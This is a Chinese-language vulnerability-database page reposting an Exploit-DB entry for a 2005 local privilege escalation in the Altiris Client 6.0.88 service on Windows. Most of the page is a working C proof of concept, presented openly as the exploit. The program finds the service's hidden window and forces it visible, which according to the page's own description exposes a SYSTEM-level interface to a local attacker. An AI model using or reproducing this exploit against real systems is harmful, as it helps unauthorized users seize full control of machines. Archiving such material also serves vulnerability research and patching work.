Altiris Client 6.0.88 – Service Privilege Escalation

Altiris Client 6.0.88 – Service Privilege Escalation

漏洞ID 1055065 漏洞类型
发布时间 2005-04-27 更新时间 2005-04-27
图片[1]-Altiris Client 6.0.88 – Service Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-Altiris Client 6.0.88 – Service Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25554
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13409/info

A local privilege escalation vulnerability affects the Altiris Client Service. This issue is due to a failure of the application to properly secure access to privileged interfaces.

An attacker may leverage this issue to gain SYSTEM level privileges on an affected computer. 

#include <stdio.h>
#include <windows.h>

int main( void )
{
        HWND hWnd;
        char szWindowName[] = "Altiris Client Service";

        printf( "Finding window %sn", szWindowName );

        hWnd = FindWindow( NULL, szWindowName );

        if ( hWnd == NULL )
        {
                printf( "ERROR! Could not find window %sn", szWindowName );

                exit( 1 );
        }

        ShowWindow( hWnd, SW_SHOW );

        return 0;
}

相关推荐: Threaded Read News Local Buffer Overflow Vulnerability

Threaded Read News Local Buffer Overflow Vulnerability 漏洞ID 1097234 漏洞类型 Boundary Condition Error 发布时间 2005-01-27 更新时间 2005-01-27 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享